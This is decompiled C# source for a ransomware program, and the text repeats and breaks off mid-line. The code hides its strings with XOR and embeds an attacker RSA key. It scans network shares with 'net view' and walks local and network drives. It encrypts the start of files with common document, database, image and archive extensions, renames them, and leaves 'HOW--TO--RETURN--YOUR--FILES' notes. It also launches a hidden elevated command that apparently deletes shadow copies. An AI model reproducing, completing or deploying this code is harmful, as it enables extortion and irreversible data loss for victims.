// this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } 0xfe, 0xd6, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, 